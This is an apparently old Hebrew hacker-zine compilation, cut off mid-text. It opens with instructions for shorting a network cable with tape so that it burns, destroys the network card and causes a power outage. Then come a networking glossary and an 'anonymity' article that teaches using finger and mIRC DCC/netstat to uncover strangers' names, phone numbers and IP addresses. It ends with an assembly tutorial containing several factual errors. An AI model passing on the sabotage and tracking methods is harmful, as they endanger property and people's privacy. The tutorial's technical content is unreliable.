‫‪ - thinnet / thicknet‬אתם לוקחים את הכבל ופותחים אותו‪ .‬תראו מה יש בפנים‪.‬‬
‫לפי מה שאני יודע אתם תמצאו שם ‪ 4‬חוטים אדומים וכל השאר לא מעניינים‪.‬‬
‫קחו את ההארבעה האדומים הללו וחפשו אותם‪ .‬עכשיו חברו את כל הקצוות החשופים אם צלוטייפ‬
‫(או כל נייר דבק אחר שיחזיק אותם ליום שלם)‪ .‬לאחר כ ‪ 14-‬שעות בערך יהיה קצר הכבל ישרף‪ ,‬גם‬
‫הכרטיס רשת‪ ,‬ותהיה הפסקת חשמל‪.‬‬

‫‪by pirs[i]ng‬‬

‫מושגים‬
‫‪ - admin‬אדמינסטור (מנהל רשת)‬
‫‪ - dns - dmain name server‬שם של דומיין שניתן ע"י שרת כשלהו‬
‫‪iso - organization for international standards / international standardization organization‬‬
‫‪ - tcp/ip‬פרוטוקול התקשורת הנפוץ ביותר בעולם ומהווה את הבסיס לרשת האינטרנט‪.‬‬
‫מבוסס על העקרון שלכל מחשב המחובר לרשת יש כתובת אי‪.‬פי המייצגת אותו‬
‫ועל ידי קריאה למספר זה ניתן להעביר מידע ממחשב למחשב‪.‬‬
‫הבסיס בשיטת העברת נתונית זו היא הפטקא‪ .‬לכל פטקא מומצד תווית מוצא ומטרה‬
‫האומרות לפאקט לאן להשלח‪ .‬הפאקט מועבר בעצמות פרוטוקול הטי‪.‬סי‪.‬פי‪/‬אי‪.‬פי‬
‫‪ - lan‬רשת מקומית‪.‬‬
‫‪ - wan‬כמו רשת מקומית רק גדולה יותר בטווח‪.‬‬
‫‪ - www - world wide web‬רשת האינטרנט‪.‬‬
‫‪ - ppp‬פרוטוקול המשמש לחיבור מחשבים דרך מודם‪ .‬נפוץ בשימוש בעת חיבור לאינטרנט‪.‬‬
‫‪ - pap‬פרוטוקול לאימות סיסמא וזיהוי המשתמש‪.‬‬
‫‪ .repeater - works under physical layer on the osi‬משחזר‪ ,‬מתגבר על מגבלות מרחק ומשחזר את‬
‫האות אשר הגיע מהצד הרחוק‪.‬‬
‫‪ - bridge‬גשר‪ ,‬משש לחיבור צמתים שונים ברשת‪ ,‬לגשרים אין כתובות ואי אפשר לפנות אליהם‬
‫לצורך מסוים‪.‬‬
‫‪ - router‬נתב‪ ,‬בוחן את כתובות היעד ומחליט מאיזה נתיב לשדר ולאן‪.‬‬
‫‪ - rip - routing information protocol‬בחירת נתיב שידור כתוצאה מבחירה בעזרת בדיקה אשר‬
‫בודקת מספר קוי תקשורת מינימליים‪.‬‬
‫‪ - spf - shortest path first‬שיפור של הריפ בשיטת בחירה זאת נלקחים בחשבון הפריטים הבאים ‪:‬‬
‫מחיר הקו‪ ,‬עומס ומהירות תעבורה‪.‬‬
‫‪ - gateway‬שער גישור‪ ,‬יחידת הפלט של הראוטר ‪ ,‬משם יוצא המידע לא משנה באיזה דרך שידור‪.‬‬
‫משם הוא יוצא !‬
‫‪ - ping‬שולח פאקט למחשב מסויים שאומר למחשב להחזיר תשובה וכך בודק את זמן התגובה של‬
‫המחשב ורואה את מהירות החיבור בין שתיי המחשבים‪.‬‬
‫‪ - ftp - file transport protocol‬יישום זה מאפשר העברת קבצים בין מחשבים שונים ברשת‪.‬‬
‫‪ - email‬יישום הדואר האלקטרוני אשר מאפשר שליחת דואר אלקטרוני בכל רחבי רשת האינטרנט‪.‬‬
‫‪ - http‬תקן לדפי היפר טקסט אשר מוצגים באינטרנט‪)html( .‬‬
‫‪ - telnet‬יישום המאפשר חיבור כמסוף אל מחשב מרוחק ברשת‪.‬‬
‫‪ - irc‬פרוטוקול אשר מאפשר שיחה בין אנשים ברשת בזמן אמת‪.‬‬
‫‪ - packet‬קבוצת נתונים קצרה המשודרת ברשת ברצף‪ .‬מידע הזורם ברשת מפורק לפאקטים קטנים‬
‫(מנות‪ ,‬חבילות) על‬
‫מנת להקל על בקרת שגיאות‪ .‬פאקט בעצם מעביר מידע בין מחשבים‪.‬‬
‫‪ - baseband‬פס בסיס‪ ,‬בשיטה הזאת קיים פס תקשורת פיסי אשר מקשר בין שתי מערכות או יותר‪.‬‬
‫‪ - broadcast‬שידור של אות או אותות כלשהם‬
‫‪ - hub‬מכשיר אלקטרוני המכיל חיבוריי רשת רבים‪ .‬לכל אחד מהחיבוריפם ניתן לחבר מחשב בעזרת‬
‫כבלי רשת‪.‬‬
‫המכשיר מקבל אותות של מידע מהמחשבים שמבחורים ברשת ומעביר אותם למחשבים האחרים‬
‫או לכתובת יעד‬
‫אחרת לפי בקשת המידע‪.‬‬
‫‪ - modem‬מודם‪ ,‬חומרה אשר מאפשרת לך להתחבר לאינטרנט ע"י קו טלפון והגדרת פרוטוקולים‬
‫נכונים‪.‬‬
‫‪ - pptp = point - to - point - tunneling protocol‬מספק סקירה כללית של פרוטוקול תיעול נקודה‬
‫לנקודה‪.‬‬
‫‪ - backdoor‬שורות קוד שמישהו הכניס במכוון כדי לאפשר לעצמו (בד"כ) גישה למשהו על מחשב‬
‫אחר יותר בקלות‪..‬‬
‫לדוגמא קוד שיפתח פורט מסויים רק לאי פי מסויים ויתן לו לכתוב שם פקודות קבועות‬
‫שיבצעו‬
‫פעולה כלשהי לפי מה שמכין הבאקדור קבע‪.‬‬
‫לפעמים האקרים אשר מצאו את הבאקדור מנצלים את זה ומכינים כמה נוספים כדי שהפריצה‬

‫הבאה למערכת תהיה פשוטה יותר !‬
‫‪ - exploit‬ניצול של חורי אבטחה ‪ -‬קודים\דרכים לנצל חורי אבטחה במערכות ‪..‬‬
‫‪. - linux‬מערכת הפעלה המבוססת על יוניקס ‪ ,‬בעלת קוד פתוח וניתנת להורדה ולשימוש בחינם‬
‫‪ - firewall‬מערכת להגנה מפני גישה לא מורשת למחשב מקומי או רשת מקומית שמחוברת‬
‫לאינטרנט‪.‬‬
‫‪ - proxy‬שרת המוקם על ידי ספקי שירות (חברות אינטרנט‪ ,‬חברות גדולות וכו') למען לקוחותיו‬
‫ותפקידו ליצור‬
‫קשר עם מחשבים ברשת ולשלוף מהם מידע על פי בקשת הגולשים‪ .‬לשרת הפרוקסי חיבור מהיר‬
‫הרבה יותר‬
‫משל הגולש הממצוע עם המודם ולכן משמש כמקום מהיר בהרבה לקבלת קבצים ממנו‪.‬‬
‫אם הרבה אנשים מבקשים את אותו קובץ ‪ -‬הקובץ נשמר בשרת הפרוקסי‪ ,‬ובכך חוסך לגולשים‬
‫את ההמתנה‬
‫לקבלת המידע משרת האינטרנט המרוחק‪ .‬על שרתי פרוקסי יש גם הגנה ולכן הם יכולים לשמש‬
‫כפיירוול‬
‫אבל בר‪.‬‬
‫‪ - protocol‬סדר פקודות\הוראות מוסכמות ומאפשרות לתכנן מערכות בכל העולם שיבינו ויוכלו‬
‫לתקשר אחת עם השניה‪.‬‬
‫‪ - binary‬שפה המורכבת מ ‪ 1 ,0 -‬והמחשב מבין אותה‪ ,‬רק אותה‪.‬‬
‫‪ - )socket )hardware‬התקן אשר לתוכו אפשר לתקוע רכיב אלקטרוני ולשחררו ללא צורך בהלחמה‪.‬‬
‫‪ - )socket )software‬כדיי שתוכנה תוכל לתקשר עם מחשב אחר עליה ליצור קשר דרך סוקט‪ ,‬התוכנה‬
‫מבצעת‬
‫פתיחה של סוקט לתוך סוקט שפתוח כשרת על מחשב אחר ויוצרת חיבור בין המחשבים‬
‫ומעבירה פאקטים בינהם‪.‬‬
‫‪ - compiler‬מחולל שינוי במה שכתבת בשפה תכנות כלשהי והופך את זה לשפת מחשב‪ ,‬בינארי ‪.‬‬
‫‪. by pirs[i]ng & rul3r‬‬

‫אנונימיות ‪ -‬אין להיות אנונימי ואיך לגלות דברים על אנשים אחרים‬
‫טוב כולכם אבל אני מדגיש כולכם ממש ממש ממש לא אנונימיים כל פעם שאתם מורידים קובץ‬
‫מאתר אז אנשי האתר יכולים (אם הם רוצים) לדעת עליכם ‪:‬‬
‫‪ip‬‬
‫‪isp‬‬
‫ארץ‬
‫עיר‬
‫סוג הדפדפן‬
‫‪os‬‬
‫רזולוציית מסך‬
‫ה ‪ url‬הקודם שביקרתם בו‬
‫עכשיו אתם בטח אומרים ‪ :‬נו אז מה למי איכפת שהאתר ידע מה רזולוציית המסך שלי‪...‬‬
‫אז אתם טועים ובגדול כי אם אתר מחורבן יכול לעשות את זה אז לאדם שקצת מתמצא בנושא אז זה‬
‫לא בעיה לגלות עליכם דברים הנה עוד דוגמא ‪:‬‬
‫במירס אפשר גם כן לגלות על מישהו הרבה דברים (במקרה הטוב הוא לא מסתיר את הדברים האלה)‬
‫שם אמיתי‬
‫כתובת‬
‫אי מייל‬
‫‪ip‬‬
‫‪isp‬‬
‫ארץ‬
‫עיר‬
‫אותו דבר גם במשחקי רשת ודברים כאלה‪....‬‬
‫נגיד אם יש לכם אי מייל של ה‬
‫‪isp‬‬
‫שלכם הנה דוגמא אם לא הבנתם‪:‬‬
‫‪muki@zahav.net.il‬‬
‫אז אתם יכולים להכנס ל‬
‫‪zahav.net.il‬‬
‫פורט‬
‫‪79‬‬
‫שזה פורט‬
‫‪finger‬‬
‫ושם אתם יכולים לגלות מלא על מוקי שלנו כמו שם אמיתי פעם אחרונה שהוא התחבר לפעמים‬
‫מספר טלפון אם יש לו אי מייל אחר‬
‫עכשיו אני לא יודע אם זה מקומי או כללי וורטקס אמר לי שזה מקומי והוא נתן לי הסבר מאוד‬
‫מאוד משכנע וסייבר פאנק ועוד איזה אחד אמרו לי שזה כללי ולא נתנו לי הסבר תחליטו לבד‪...‬‬
‫איפה הקאצ'‬
‫הנה יש מלא סרברים שחסמו את זה אבל אם זה באמת מקומים אז יש לכם יותר סיכוי להצליח‬
‫למצוא כי יש יותר‬
‫(יותר סרברים יותר סיכוי)‬
‫נכון זה נורא מעצבן אם אתם רוצים לדבר עם מישהו באיי סי קיו והוא יענו לא מחובר אבל יש לכם‬
‫הרגשה שהוא מתעלם ממכם אז אני מביא את הגאולה נכון יש תוכנה שמגלה אבל הרבה הרבה יותר‬
‫כיף לעשות דברים ידנית (אפילו לקרוא אי מייל) אם אתם יודעים את האי מייל שלו אז תכנסו לפינגר‬
‫שדיברתי עליו מקודם ותראו אם הוא באינטרנט או לא‬

‫מייל אנונימי‬
‫כל פעם שאתם מקבלים אי מייל אז אם תלחצו לחצן ימני על המייל ואז ‪ proparties‬אז תקבלו את ה‬
‫‪ ip‬של השולח אפילו אם תשלחו אי מייל מזוייף עם טלנט יראו את ה ‪ ip‬שלכם (זאת אחת הדרכים‬
‫לגלות אי מייל מזוייף)‬
‫שאלה‪ :‬איך עוקפים את זה?‬
‫אז יש ‪ remailer‬שזה כמו לינק אם שולחים ל נגיד ‪ muki@remailer.com‬אז זה אוטומטית מעביר‬
‫את הדואר ל ‪muki@zahav.net.il‬‬
‫זה טוב ויפה אבל מה קורה כשאתם רוצים לשלוח דואר אז יש שירותי ‪ remailer‬שזה כמו פרוקסי‬
‫אחרי השליחה רואים את ה‪ ip‬של ה‪ remailer‬ולא את שלכם‬
‫שאלה‪ :‬איך משתמשים בשירותי ‪ remailer‬לשליחת דואר אנונימי?‬
‫אז אתם נכנסים עם טלנט לשרת פורט ‪ 25‬מכניסים את השם משתמש והסיסמא (רישום חינם) ואז‬
‫משם אתם שולחים אם אתם לא בדיוק מבינים מה לעשות מקסימום תדברו איתי במירס‬
‫עוד שיטה לאי מייל אנונימי אבל זה סוג אחר של אנונימיות המטרה של זה שאחרים לא יקראו ולא‬
‫שלא יגלו אותך אז הנה השיטה‬
‫‪pgp‬‬
‫אם אתם לא יודעים מה זה תכנסו ל ‪ www.whatis.com‬ותחפשו שם (יש שם הסברים מצויינים‬
‫כמעט לכל דבר)‬
‫עוד על הדואר‬
‫שאלה‪ :‬איך אני מגלה אם הדואר שקיבלתי מזוייף או לא?‬
‫קודם כל יש את ה ‪ header‬כדי להכנס אליו לוחצים לחצן ימני על המכתב ‪ properties‬שם ב ‪details‬‬
‫זה בעצם ה ‪ header‬עכשיו אם הוא קצר (עשר שורות אבל כל שורה דיי קצרה) אז זה כבר מעלה חשד‬
‫עכשיו את תסתכלו ב ‪ header‬תראו שיש שם אנפורמציות דיי מענינות כמו האיי פי של השולח שרת‬
‫הדואר שממנו נשלח או שרת הדואר שמצויין אם זה באמת מזוייף אז זה השרת שהתחברו אליו‬
‫וממנו זייפו אז אם זיוף רציני על משהו חשוב אז החברה יכולה להסתכל בלוגים של השרת ולראות‬
‫לפי האיי פי שלכם (הוא כבר כתוב ב ‪ ) header‬מה בדיוק מה עשיתם אז נחזור לעניינינו איך מגלים‬
‫אם זה מזוייף‪ ,‬אז באי מייל אמיתי יש ‪ stmp id‬אם אין זה בטוח מזוייף אבל גם אם יש זה עדיין לא‬
‫מאה אחוז מזוייף עוד דבר יש תוכנה שאם מכניסים איי פי אז הוא אומר לך איזה ‪ isp‬זה אם תעשו‬
‫את זה אז זה ממש עוזר כי קיבלתם מייל מאנגליה ואתם חושדים שזה מזוייף תכנסו לתוכנה תכניסו‬
‫את ה ‪ ip‬ואם כתוב שזה נגיד אינטרנט זהב אז זה לא אנגליה‪...‬‬
‫האתר של התוכנה הזאת היא בסוף הטקסט בקטע של הלינקים‬
‫‪coockies‬‬
‫אני מניח שאתם כבר יודעים מה זה אז מה לעזאזל אני רוצה ממכם אז זהו שאם מישהו משיג את‬
‫הקוקיז שלכם לא הכי קשה להשיג אז יש לו סיכוי קטן אבל יש לפענח את ההצפנה של הקוקי במיוחד‬
‫אם זה אתר מחורבן‬
‫ועוד משהו אתרים יכולים לגלות עליכם הרבה יותר ממה שאתם חושבים רק על ידי שימוש בקוקיז‬
‫מסקנה‪ :‬כדאי למחוק אותם אבל לא צריך להיות יותר מידי פרנואידים‬

‫קבצים שמכילים פרטים עליכם‬
‫טוב אם אתם רוצים למחוק את כל הקבצים שמכילים פרטים עליכם כדאי שתשרפו את ההארד דיסק‬

‫אבל הנה דברים שאתם יכולים למחוק‬
‫קוקיז (בתיקייה של הקוקיז וב ‪ temporary internet files‬יש גם שם מלא קוקיז)‬
‫‪file0001.chk‬‬
‫‪file0001.chk‬‬
‫בדרך כלל נמצאים בכונן סי‬
‫‪mirc‬‬
‫אין כל כך הרבה מה לעשות או שיש ואני לא אומר‪ ): ...‬סתאאאאאם‬
‫אפשר בשרתים מסויימים להסתיר את האיי פי על ידי הפקודה הבאה‬
‫‪mode yournick +x/‬‬
‫לא בכל השרתים זה עובד‬
‫שאלה‪ :‬טוב ויפה אבל איך מגלים איי פי במירס זה מה שכולנו באמת רוצים לדעת‪...‬‬
‫אז אפשר לעשות‬
‫‪dcc chat‬‬
‫ואז לעשות ‪netstat‬‬
‫תאמינו לי עובד מצויין‬
‫או‬
‫‪dns/‬‬
‫יש שרטים שחוסמים את זה (רובם) בגלל זה השיטה שקודמת הרבה יותר טוב‬
‫אפשר גם במירס להכניס פרוקסי תבדקו באפשרויות של מירס ממש פשוט להכניס שם את הפרטים‬
‫‪icq‬‬
‫כדי להסתיר את האיי פי שלכם תעשו את הדברים הבאים‪:‬‬
‫כנסו ל ‪ preferences‬שם לכן ל ‪ connections‬שם תסמנו את ‪i'm using a permanent internet‬‬
‫‪)conection )lan‬‬
‫שם תסמנו את ‪ i am behind a fire-wall‬תסמנו את ‪ i am using a sock 4 proxy‬תלחצו ‪ next‬אחרי‬
‫זה הוא יבקש איי פי תתנו את האיי פי של הפרוקסי אחרי זה הוא ישאל אותכם על ‪sock port 4‬‬
‫תכתבו שם ‪ 4000‬אחרי זה תסמנו את ‪ open an outgoing upd port 4000 on my fire-wall‬תלחצו‬
‫‪ next‬אחרי זה תופיע ההודעה ‪ check my fire-wall/proxy conection‬חשוב מאוד להיות מחובר‬
‫לאינטרנט אבל לא לרשת ה ‪ icq‬זה חשוב מאוד‬
‫זהו‬
‫כדי להחזיר את המצב פשוט תחזרו למצב מודם רגיל בהגדרות‬
‫לינקים‬
‫‪ http://www.pgpi.com‬על הצפנה והצפנת האי מיילים שלכם‬
‫‪ http://www.cyberarmy.com/lists‬רשימה של פרוקסיז אנונימיים טובים‬
‫‪ http://www.multiproxy.org/anon_list.htm‬רשימה של פרוקסיז מצוווווינים (תודה לסינטאקס)‬
‫‪ - www.neotracer.com‬התוכנה שמאתרת איי אס פי‬
‫‪by ndr113‬‬

‫אסמבלר‬
‫מה זה אסמבלר בכלל ? בטוח שמעתם את השם הזה פעם או פעמיים בחיים אז אני יסביר מה זה ולמה זה‪.‬‬
‫מה בכתבה ?‬
‫• הסבר קצר על אסמבלר‬
‫• בסיסי ספירה‬
‫• המרה מבינארי לדצימלי‬
‫• אוגרים‬
‫•פקודות‬
‫הסבר‪.‬‬
‫אסמבלר היא שפת תכנות אשר לוקחת פקודות מחשב פשוטות והופכת אותם לחבילות של ביטים אשר עובדים‬
‫תחת אוגרים ומריצים את הפקודות שכתבתם בה בתור תוכנית‪.‬‬
‫אסמבלר היא שפת סף‪ ,‬היא לא שפה עלית כמו סי או ויז'ואל בייסיק‪.‬‬
‫‪ */‬הכוונה היא‪ c :‬לדוגמה היא שפת תכנות הגיונית‪ .‬אתם אומרים לה‬
‫‪printf‬‬
‫והיא מדפיסה משהו על המסך‪ .‬לעומתה אסמבלר זה הדבר הכי קרוב לשפת מכונה (אחרי שפה בינארית כמובן)‬
‫שאפשר לתכנת בו‪ .‬אם תסתכלו על קוד של אסמבלי לא תבינו מיד מה הוא עושה‪ ,‬אלא תצטרכו לעקוב‪ ,‬לחשוב‪,‬‬
‫להסתכל ולנסות להבין מה בדיוק דוחפים למחסנית ולמה כשעושים‬
‫‪push %eax‬‬
‫לדוגמה‪ .‬בלאדי‪/* .‬‬
‫נתחיל את כל הלמידה שלנו ממשהו פשוט‪:‬‬
‫בסיסי ספירה‪.‬‬
‫(הקסדצימלי (בסיס ‪16‬‬
‫‪0‬‬
‫‪1‬‬
‫‪2‬‬
‫‪3‬‬
‫‪4‬‬
‫‪5‬‬
‫‪6‬‬
‫‪7‬‬
‫‪8‬‬
‫‪9‬‬
‫‪a‬‬
‫‪b‬‬
‫‪c‬‬
‫‪d‬‬
‫‪e‬‬
‫‪f‬‬
‫כמה דברים שכדאי לזכור !!!‬
‫‪.1‬בסיס בינארי מתאפיין רק בשני מספרים‪ 0 ,‬ואחד‪.‬‬
‫‪.2‬במספרים בינארי יש דבר שנקרא אפס מוביל‪ ,‬למשל אתה צריכים מילה בינארית למילת מחשב בת ‪ 7‬אותיות‬
‫אבל מספר הבינארי שלכם הוא ‪ 6‬אותיות אז אתם יכולים להוסיף אפס משמאל והמחשב מתייחס אליו‬
‫כמו ל ‪ 0‬ואילו אם תוסיפו מצד שני‪ ,‬זה יהיה מספר אחר והמחשב לא יריץ את התוכנית הנכונה‪ .‬דוגמא‪:‬‬
‫‪ 6‬אותיות ‪ 7 , 1101010 -‬אותיות ‪ ,01101010 -‬שימו לב לאפס האדום שהוספתי‪.‬‬
‫‪ .3‬כל בסיס פרט לבינארי ימשיך את סדרת המספרים העולה עד למספר של הבסיס פחות אחד‪ ,‬דוגמא‪ ,‬בסיס‬
‫‪ 15‬יהיה מספר ‪ .0-14‬בסיס ‪ 99‬יהיה מספרים ‪.0-98‬‬
‫‪ .4‬הטבלה שלמעלה תעזור לכם להמיר מספר‪ ,‬אם אתם צריכים להמיר מספר ‪ 15‬באוקטלי למספר בדצימלי אז‬
‫מה עושים ?‬
‫לוקחים את ‪ 1‬שזה ‪ 0001‬ולוקחים את ‪ 5‬שזה ‪ 0101‬ומחברים‪ ,‬קיבלתם ‪ 000101010‬ועכשיו עושים המרה למספר‬
‫רגיל (דצימלי)‪ .‬והנה ההסבר איך להפוך מבינארי לעשרוני (דצימלי)‪.‬‬
‫המרה מבינארי לדצימלי‪:‬‬
‫(דצימלי (בסיס ‪10‬‬
‫‪0‬‬
‫‪1‬‬
‫‪2‬‬
‫‪3‬‬
‫‪4‬‬
‫‪5‬‬
‫‪6‬‬
‫‪7‬‬
‫‪8‬‬
‫‪9‬‬
‫‪10‬‬
‫‪11‬‬
‫‪12‬‬
‫‪13‬‬
‫‪14‬‬
‫‪15‬‬

‫(אוקטאלי (בסיס ‪8‬‬
‫‪0‬‬
‫‪1‬‬
‫‪2‬‬
‫‪3‬‬
‫‪4‬‬
‫‪5‬‬
‫‪6‬‬
‫‪7‬‬
‫‪------------------‬‬‫‪------------------‬‬‫‪------------------‬‬‫‪------------------‬‬‫‪------------------‬‬‫‪------------------‬‬‫‪------------------‬‬‫‪-------------------‬‬

‫(בינארי (בסיס ‪2‬‬
‫‪0000‬‬
‫‪0001‬‬
‫‪0010‬‬
‫‪0011‬‬
‫‪0100‬‬
‫‪0101‬‬
‫‪0110‬‬
‫‪0111‬‬
‫‪1000‬‬
‫‪1001‬‬
‫‪1010‬‬
‫‪1011‬‬
‫‪1100‬‬
‫‪1101‬‬
‫‪1110‬‬
‫‪1111‬‬

‫איך אני הופך מבינארי לעשרוני‪.‬‬
‫הסבר ודוגמא‪:‬‬
‫ניקח את המספר ‪ ,00110011‬בחישוב מהיר הוא מסמל את המספר ‪.51‬‬
‫אוקי איך עשיתי את זה‪.‬‬
‫הנה היא הטבלה של הבינארי ‪ -‬במחשבים‪.‬‬
‫‪64‬‬
‫‪128‬‬
‫נכניס את הבינארי מתחת‪.‬‬
‫‪0‬‬
‫‪0‬‬

‫‪32‬‬

‫‪16‬‬

‫‪8‬‬

‫‪4‬‬

‫‪2‬‬

‫‪1‬‬

‫‪1‬‬

‫‪1‬‬

‫‪0‬‬

‫‪0‬‬

‫‪1‬‬

‫‪1‬‬

‫עכשיו אם יש מתחת לספרה האמיתית ‪ 0‬אז המספר שווה אפס אבל אם יש אחד אז הוא שווה כמה שכתוב מעל‬
‫ה‪.1‬‬
‫למשל‪:‬‬
‫יש אחד מעל האחד אז זוכרים ‪ ,1‬יש אחד מעל ה ‪ ,2‬זוכרים עוד ‪,2‬‬
‫וכו' עד שמגיעים ל‪.51 = 1+2+16+32 :‬‬
‫ברור ? אני אתן לכם פה תרגילים או שתיים‪:‬‬
‫‪? = 11001100‬‬
‫‪? = 00000010‬‬
‫בראשון אמור לצאת ‪.204‬‬
‫בשני אמור לצאת ‪.2‬‬
‫אני מקווה שהבנתם אם לא תקראו שוב כי זה לא ממש קשה‪.‬‬
‫עכשיו איך הופכים מעשרוני לבינארי? זה קצת יותר מסובך אבל עדיין נכנס להגדרה של קל‪.‬‬
‫ניקל את המספר ‪ 143‬ואז מה עושים ?‬
‫‪128‬‬

‫‪64‬‬

‫‪32‬‬

‫‪16‬‬

‫‪8‬‬

‫‪2‬‬

‫‪4‬‬

‫‪1‬‬

‫יאללה בוא נתחיל‪ ,‬משמאל לימין‪,‬‬
‫האם ‪ 143‬נכנס בתיבה של ‪ ,128‬אם הוא גדול מ ‪ 128‬זה אומר שכן‪ ,‬אז נרשום שם אחד‪.‬‬
‫עכשיו נשאר לנו ‪.)143-128( 15‬‬
‫נמשיך‪ 15 ,‬נכנס ב ‪ ,64‬לא‪ .‬נכתוב שם אפס‪ ,‬האם ‪ 15‬נכנס ב ‪ ,32‬גם לא‪ ,‬נשאיר שם אפס‪.‬‬
‫‪ 15‬לא נכנס ב ‪ ,16 -‬אז נכתוב גם שם ‪.0‬‬
‫‪ 15‬נכנס ב ‪ ,8‬כן אז נכתוב שם אחד ונשאר לנו ‪. )15-8( 7‬‬
‫‪ 7‬נכנס ב ‪ ,4‬כן נכתוב אחד ונשאר לנו ‪)7-4( 3‬‬
‫‪ 3‬נכנס ב שתיים‪ ,‬כן נכתוב שם אחד ונשאר לנו אחד (‪.)3-2‬‬
‫ועכשיו נשאר אחד והוא מתאים בול לאחד בסוף אז גם שם נכתוב ‪.1‬‬
‫איזה בינארי יצא לנו ?‬
‫‪10001111‬‬
‫מקווה שהבנתם‪ ,‬אם לא‪ ,‬אז תחזרו על זה…‬
‫‪1‬‬
‫‪2‬‬
‫‪4‬‬
‫‪8‬‬
‫‪16‬‬
‫‪32‬‬
‫‪64‬‬
‫‪128‬‬
‫‪1‬‬
‫‪1‬‬
‫‪1‬‬
‫‪1‬‬
‫‪0‬‬
‫‪0‬‬
‫‪0‬‬
‫‪1‬‬
‫אוקי אז עכשיו תתרגלו את זה עד שתעשו את זה בלי דף נייר ובלי מחשבון (שזה הדרך הקלה)‪.‬‬
‫** הנה שיטה שתעשה לכם חיים קלים‪ ,‬אם צריכים להפוך מספר מבסיס ‪( x‬כל בסיס חוץ מבינארי) לבסיס‬
‫דצימלי (עשרוני) אז קודם עושים המרה לבינארי לפי הטבלה שלמעלה ואז מבינארי לעשרוני‪ ,‬תאמינו לי הכי‬
‫קל‪.‬‬
‫עכשיו… הייתי מעוניין להתחיל לדבר קצת על אוגרים‪.‬‬
‫אוגרים‪:‬‬
‫אוגרים הם בעצם תאי זיכרון בתוך המעבד‪ ,‬ישנם ‪ 4‬אוגרים כלליים שבד"כ מתכנתים באסמבלר משתמשים‬
‫בהם והם‪ ax, bx, cx, dx ,‬וישנו עוד אוגר ‪ ip‬אבל לא צריך אותו כרגע‪ ,‬נחזור אליו בעתיד‪.‬‬

‫כל אוגר הוא אוגר של ‪ 16‬סיביות‪ ,‬שניתן לחלקו לשני חלקים‪ ,‬כל חלק ‪ 8‬סיביות‪.‬‬
‫עכשיו מה הפרוש הפרקטי של כל אוגר ‪:‬‬
‫‪ax - accumulator‬‬
‫‪bx - base‬‬
‫‪cx - count‬‬
‫‪dx - data‬‬
‫‪ip - instruction pointer‬‬

‫‪ */‬פירסינג יקירי‪ ,‬שכחת לציין מה תפקידו של כל אוגר…‬
‫ככה‪ ax :‬משמש בד"כ לזכור ערכים‪ .‬ביצעתם פעולה חשבונית? אחסנתם מספר? זה בד"כ יהיה‬
‫מאוחסן באוגר הזה‪.‬‬
‫‪ bx‬אומר לפי איזה בסיס לבצע חישובים‪ .‬לא מעניין כרגע‪.‬‬
‫‪ cx‬הוא מונה‪ .‬אם יש לכם לופ ואתם צריכים מונה‪ ,‬תשתמשו באוגר הזה‪.‬‬
‫‪ dx‬גם לאחסון ערכים‪.‬‬
‫‪ ip‬זה אוגר מאוד מאוד חשוב‪ .‬לא מכניסים בו ערכים‪ .‬הוא משמש לציין איפה ההתחלה של התוכנית‬
‫שלכם‪ ,‬ז"א מאיפה להתחיל לבצע את ההוראות‪.‬‬
‫את כל האוגרים האלה ועוד הרבה הרבה אחרים תראו בעזרת תוכנת‬
‫‪ debug‬שבאה עם דוס‪ .‬כדי ללמוד איך להשתמש בתוכנה‪ ,‬פנו ל ‪ reference‬בסוף הטקסט הזה‪ .‬בלאדי‪.‬‬
‫*‪/‬‬
‫בואו נגיד שזהו אוגר ה ‪ ax‬שלנו‪ ,‬אני יסביר איך הוא בנוי‪.‬‬
‫‪15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0‬‬
‫‪15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0‬‬
‫האוגר שיותר למעלה‪ ,‬מראה לכם את ‪ ax‬במצב טבעי‪ ,‬כולל את כל ‪ 16‬הביטים שלו ואילו האוגר‬
‫שיותר למטה מחולק לשתיים‪ ,‬כל חלק ‪ 8‬ביט כמו שכתבתי למעלה‪.‬‬
‫ניתן לך תרשים של כל האוגרים שנשתמש בהם‪:‬‬
‫‪0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ax‬‬
‫‪0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 bx‬‬
‫‪0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 cx‬‬
‫‪0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 dx‬‬

‫אני בטוח ששמתם לב שאמרתי שיש ‪ 16‬ביטים בכל אוגר וכתוב רק ‪ ,15‬לאלה שלא הבינו למה‪ ,‬כמו‬
‫שאמרתי למעלה‪ ,‬באסמבלר עושים את כל הסדרה פחות ‪ 0( 1‬משומש כמו‪-‬כן)‪.‬‬
‫אוקי‪ ,‬אני מקווה שעד לפה אתם עוקבים ועכשיו הייתי רוצה לעבור לפקודות‪.‬‬
‫אוקי עכשיו עוד משהו‪ ,‬כל אוגר שמחולק לשתיים יקרא כך‬
‫| ‪ax -‬‬
‫‪al‬‬
‫|‬
‫‪ah‬‬
‫‪ ah‬מסמל אוגר ‪ a-high‬ואילו ‪ al‬מסמל אוגר ‪.a-low‬‬
‫ככה כל אחד ואחד מהם‪ ,‬מ ‪ ax‬עד ל ‪.dx‬‬
‫‪ ax‬שווה ‪ 16‬סיביות‪ ,‬ואילו ‪ al‬שווה ‪ 8‬סיביות‪ ,‬חשוב מאוד לזכור את זה‪ ,‬קצת תרגול‪:‬‬
‫אני רושם אוגר או חלק מאוגר ואתם רושמים כמה סיביות יש בתוכו‪.‬‬
‫‪? = ax‬‬
‫‪? = bl‬‬
‫‪? = al‬‬
‫‪? = ch‬‬
‫‪? = dl‬‬
‫(תשובות בסדר יורד‪),16,8,8,8,8 ,‬‬
‫(* רמז‪ ,‬הראשון זה ‪).16‬‬
‫פקודות‪.‬‬
‫אני אתן פקודה‪ ,‬איך כותבים אותה ומה פירוש הפקודה‪.‬‬

‫לא לשכוח‪ ,‬יש פסיק אחרי כל שם של אוגר ולא לשכוח נקודה פסיק בסוף הפקודה (;)‪.‬‬
‫ברירת המחדל של הקומפלייר היא שונה בכל תוכנה ותוכנה יש כאלה שאצלם ברירת המחדל היא ‪,16‬‬
‫אז כל מספר שתכניס היא תחשיב אותו בבסיס ‪ 16‬וכדומה‪ ,‬אז בואו נגיד שכרגע ברירת המחדל שלנו‬
‫היא ‪ ,10‬בסיס דצימלי‪ ,‬עשרוני‪.‬‬
‫הדוגמא תהיה מסומנת באדום‪.‬‬
‫העתקה של ערך ‪mov -‬‬
‫צורה ‪mov op1, op2; -‬‬
